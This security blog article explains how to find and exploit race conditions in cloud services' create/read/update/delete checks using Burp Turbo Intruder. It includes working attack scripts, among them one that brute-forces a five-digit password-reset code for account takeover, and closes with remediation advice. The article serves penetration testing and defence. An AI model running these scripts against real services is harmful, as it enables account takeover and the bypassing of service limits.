
Finding and Exploiting Race Conditions in the Cloud

Written By: Connor MacLeod


What Are Race Conditions?

Race conditions are a well-known but rarely discovered class of vulnerability. In today’s landscape of highly scalable, multi-tenant cloud services, these vulnerabilities are more prevalent than ever, yet they remain largely undiscovered and under-discussed in the security field.

A race condition is traditionally defined as a “flaw that produces an unexpected result when the timing of actions impacts other actions,” which is a terrifically unhelpful definition. For this article, we will discuss a specific subset of race conditions: those that occur when an attacker sends numerous web requests nearly simultaneously to bypass restrictions on creating, reading, updating, or deleting objects (the CRUD functions).

This technique was first brought to our attention by a security researcher and cybersecurity celebrity, James Kettle, in his article “Turbo Intruder: Embracing the billion-request attack.” Since that article was published, we have been using Turbo Intruder and developing techniques for locating and exploiting these race conditions.

In this article, we will cover the process of locating these race conditions, explain why they are becoming more common, and show how to configure Turbo Intruder to find and exploit them. Finally, we offer our suggestions for remediation (the most difficult task of this entire process).

Why These Race Conditions Are So Prevalent in the Cloud

The qualities that leave cloud services so vulnerable to race conditions are the same qualities that make cloud services appealing: high scalability and multi-tenancy. A service that is spread across multiple regions while relying on a central database presents a huge attack surface. When a user performs an action that requires a database check, the time needed to make that check in the cloud is significant compared to a dedicated-server solution. This gap between time-of-check and time-of-use creates the space for a potential race condition, also known as a TOCTOU (time-of-check/time-of-use) vulnerability. We have addressed TOCTOU vulnerabilities before at Security Compass; they are usually discussed in the context of operating systems, but this article focuses on their rising prevalence in cloud-based services. Specifically, we will look at exploiting TOCTOU vulnerabilities in database operations (CRUD).

Many services will allow users to perform CRUD actions, but restrictions (the “checks” in TOCTOU) are almost always involved. These restrictions may enforce how many resources can be created with a free-tier account, ensure that a user can’t buy something that costs more than the amount of credit in their account, or enforce limits on the use of a password-reset token.

These restrictions are usually imposed by way of application code that requires a database lookup. When a user makes a request to create a resource and said resource has been capped, the back end will perform a database lookup and check to see whether the cap has been hit. The result will determine whether the request succeeds. The moment of success marks the TOCTOU “time of use.” But what if there are 50 simultaneous requests made to create a resource that is capped at ten?
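To see where the window comes from, here is a minimal sketch of the vulnerable check-then-act pattern, assuming a hypothetical handler and database helper (every name here is illustrative rather than taken from a real service):

# Hypothetical resource-creation handler (illustrative names only)
def create_resource(user_id, payload, db):
    # Time of check: count the user's existing resources
    count = db.query("SELECT COUNT(*) FROM resources WHERE owner = ?", user_id)
    if count >= 10:
        return {"error": "resource limit reached"}, 403

    # ...network hops, serialization, replication lag...

    # Time of use: create the resource
    db.execute("INSERT INTO resources (owner, data) VALUES (?, ?)", user_id, payload)
    return {"status": "created"}, 201

Fifty requests that all reach the SELECT before any of them commits an INSERT will all read a count below the cap, and all fifty will succeed.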

How to Locate These Vulnerabilities

Let’s imagine a scenario in which a cloud service offers a password-reset function that uses a five-digit number sent to the user’s email. When submitting this five-digit code, the user can make ten attempts to enter the correct code. After ten failed attempts, the code is invalidated. The TOCTOU “check” here is the confirmation of whether ten attempts have been made, and the TOCTOU “use” is the attempt itself. 

If we assume there is a one-second window between the time of the check and the time the submission is counted as “used,” the perfect conditions for a TOCTOU vulnerability are present. If we send 100,000 simultaneous requests covering every code from 00000 to 99999, each one will prompt a database lookup (all at the same time) and each one will pass the check, because, according to the database, there have been zero submission attempts. Every request will succeed, and one of them will contain the correct code and trigger the password-reset flow. And just like that, we will have brute-forced a password reset and stolen an account. In fact, exactly this exploit was discovered in AWS Cognito using Turbo Intruder (Password reset code brute-force vulnerability in AWS Cognito | Pentagrid AG).

So, how can we apply this understanding and convert it into indicators of when to check a request for a race condition? When trying to locate one of these race conditions, it’s best to look at any requests being sent to the service and ask the following questions:

  • Is this request performing a CRUD operation? 
  • Are there any restrictions (i.e. “checks”) related to this CRUD action? 

If the answer to both questions is “yes,” a TOCTOU vulnerability might exist. Let’s look at a situation where one of these conditions (i.e. the “check”) is not present: an online purchase with a credit card. The purchase is a CRUD operation (a new transaction is created), but there may not be any limits associated with that transaction. If an attacker were to attempt to exploit a race condition here, the result might be dozens of normal transactions that leave the attacker with a large credit card bill to pay. 

Exploitation and Turbo Intruder

Let’s say we have discovered a request that performs a CRUD action and has a restriction imposed on it that we want to bypass. How do we do that? Well, we know the answer involves the Burp Turbo Intruder tool, but let’s talk about the specifics of configuration. First, capture the request in Burp Suite, then send it to Turbo Intruder. We can start with the “race.py” template provided in the Turbo Intruder GitHub repository. Let’s break down what this configuration script does.

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=30,
                           requestsPerConnection=100,
                           pipeline=False
                           )
 
    # the 'gate' argument blocks the final byte of each request until openGate is invoked
    for i in range(30):
        engine.queue(target.req, target.baseInput, gate='race1')
 
    # wait until every 'race1' tagged request is ready
    # then send the final byte of each request
    engine.openGate('race1')
 
    engine.complete(timeout=60)
 
 
def handleResponse(req, interesting):
    table.add(req)

First, we define the parameters of the request engine. Doing so will determine the number of concurrent connections, the number of requests per connection, and, optionally, the HTTP stack we will use to perform the attack. For now, we only need to worry about the “concurrentConnections” parameter; set its value to a number large enough to bypass the limit imposed by the service. 

Next, let’s look at the “for” loop used to queue all the requests we are going to send. The first argument is the base request that was sent to Turbo Intruder (which you can view and edit in the top half of the Turbo Intruder window). The next argument is optional and is used for string substitution: we can place a “%s” anywhere in the target request (again, in the top window), and the value passed here will be substituted for it when the request is sent. This is useful for requests that require incrementing, like our earlier example of brute-forcing a password reset with a five-digit code. The final argument is a keyword argument called ‘gate’; this is the key to our attack. A gate lets requests be queued and streamed to the server ahead of time while withholding the final byte of each one; when the gate is opened, those final bytes are released together, so every request completes nearly simultaneously.
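As a concrete illustration of the substitution argument, here is a sketch of queueRequests adapted to the earlier five-digit reset-code scenario. It assumes a %s placeholder has been placed in the captured request where the code belongs; the connection and timeout values are placeholders that would need tuning (and likely batching) against a real target.

def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=100,
                           requestsPerConnection=1000,
                           pipeline=False
                           )

    # queue one request per candidate code, substituting it for the %s
    # placeholder in the captured request; every request waits behind the same gate
    for code in range(100000):
        engine.queue(target.req, str(code).zfill(5), gate='race1')

    # release the final byte of every queued request at once
    engine.openGate('race1')
    engine.complete(timeout=120)


def handleResponse(req, interesting):
    table.add(req)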

Finally, we open the gate we set earlier and wait for the responses to come back. Then, in handleResponse, we can define filters that determine which responses are added to the results table displayed when the attack finishes. In most cases we can leave this alone, which lets us see all requests and responses.
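If the results table becomes noisy, a simple filter in handleResponse helps. The sketch below only records responses whose status code suggests the restricted action succeeded; the code to match (or whether to match on the response body instead) depends on the target service.

def handleResponse(req, interesting):
    # only record responses that indicate the restricted action succeeded;
    # adjust the status code (or match on the response body) for the target service
    if req.status == 200:
        table.add(req)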

Now we can see the results and whether we found a race condition. We want to check the number of successful requests and see whether that number exceeds the service limit we are trying to bypass. Even if we can surpass it by one or two requests, doing so would be a solid indicator of a race condition. From here, we can tinker with the attack by sending more requests per connection or by using more connections to see how far we can exceed the limit and assess the impact of our finding.

Advanced Exploitation and Customizing Turbo Intruder

What if the situation is a bit more complicated? What if we need to use other Burp Suite extensions in combination with our Turbo Intruder attack? What if we need to send various requests to different endpoints simultaneously? Not to worry; Turbo Intruder can accommodate all of these.

To accommodate other Burp Suite extensions, we can swap the HTTP stack used in the engine configuration at the beginning of the script by adding a new keyword argument: ‘engine=Engine.BURP2’. This tells Turbo Intruder to use Burp’s HTTP/2 stack instead of Turbo Intruder’s default custom HTTP stack. Be warned that swapping the stack this way may have some performance impact and should be done with caution.
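For example, a sketch of the earlier engine configuration routed through Burp’s stack (the remaining parameters are unchanged from the race.py template):

    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=30,
                           requestsPerConnection=100,
                           pipeline=False,
                           engine=Engine.BURP2  # route requests through Burp's own HTTP stack
                           )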

To send simultaneous requests to multiple domains or multiple endpoints, things get a bit trickier, and there are two solutions you can explore. The first comes from the Turbo Intruder GitHub repository and suggests creating multiple engines and taking advantage of Python to manage the requests. Our preferred solution is one we developed that allows two separate Turbo Intruder windows to execute at the same time. By taking advantage of Python’s decorators and the datetime library, we can construct a decorator that executes a function at a specific time. Using this method, we wrap the openGate call in a function decorated with the same time value in both Turbo Intruder instances and start them both; neither gate opens, and no final bytes are sent, until that time is reached. Here is the “race.py” configuration from earlier with a simple decorator implementation added.

# Execute Turbo Intruder attacks at a given time HH:MM
from datetime import datetime


def execute_at(time_str):
    # decorator factory: delays the wrapped function until the local clock reads time_str
    def decorator(func):
        def wrapper(*args, **kwargs):
            # busy-wait until the current time matches the target HH:MM
            while datetime.now().strftime("%H:%M") != time_str:
                pass
            func(*args, **kwargs)
        return wrapper
    return decorator


def queueRequests(target, wordlists):
    engine = RequestEngine(endpoint=target.endpoint,
                           concurrentConnections=30,
                           requestsPerConnection=100,
                           pipeline=False,
                           engine=Engine.HTTP2
                           )

    # the 'gate' argument blocks the final byte of each request until openGate is invoked
    for i in range(30):
        engine.queue(target.req, target.baseInput, gate='race1')

    # wait until every 'race1' tagged request is ready,
    # then send the final byte of each request
    # (openGate is non-blocking, just like queue)

    # CHANGE THIS TO CHANGE WHAT TIME IT EXECUTES
    @execute_at("11:30")
    def open_gate():
        engine.openGate('race1')

    open_gate()

    engine.complete(timeout=900)


def handleResponse(req, interesting):
    table.add(req)

For more information on the Turbo Intruder configuration, we highly recommend James Kettle’s original article and the GitHub repository.

Remediation

The final hurdle with these race conditions is remediation. The typical recommendation for a race condition is to implement mutexes and thread locks to prevent concurrency in key areas. However, this is a very problematic solution for most cloud services: in many situations, a naïve implementation of thread locks would degrade performance to the point where the service becomes unusable under load. In most cases, we have found that the best fix uses an array of solutions in a configuration that best fits the service, because each service is unique and poses unique challenges. The remediation is usually a combination of the following (a sketch of one database-level approach follows the list):

  • Thread locks/mutexes
  • Per-session rate limiting
  • Forced synchronization on the database
  • Database isolation controls (e.g., stricter transaction isolation levels)
  • A preference for inserts over updates in database operations
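As an illustration of the database-side items, here is a minimal sketch that collapses the check and the use into one atomic statement. The schema, handler, and db helper are hypothetical; the point is that the WHERE clause re-checks the balance at write time, so concurrent requests cannot all spend against the same stale read.

# Hypothetical purchase handler (illustrative schema and helper, not a real API)
def purchase(user_id, item_id, price, db):
    # check and use happen in one atomic UPDATE: the database only applies
    # the decrement if the balance is still sufficient at write time
    rows = db.execute(
        "UPDATE accounts SET credit = credit - ? "
        "WHERE user_id = ? AND credit >= ?",
        (price, user_id, price),
    )
    if rows == 0:
        return {"error": "insufficient credit"}, 402

    # record the purchase as a new row (insert rather than update)
    db.execute(
        "INSERT INTO purchases (user_id, item_id, price) VALUES (?, ?, ?)",
        (user_id, item_id, price),
    )
    return {"status": "purchased"}, 201

The same idea applies to caps on resource creation: a conditional insert or a unique constraint lets the database, rather than application code, arbitrate between concurrent writers.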

These techniques allow us to easily and consistently identify potentially critical security risks in modern cloud infrastructure and services. Since Turbo Intruder became publicly available in 2019, we have seen race conditions that had previously gone undetected in popular cloud services for years. While cloud providers have been receptive and quick to patch these vulnerabilities, they must be discovered before they can be fixed.

You can find all of the latest technical content from Advisory Labs here.
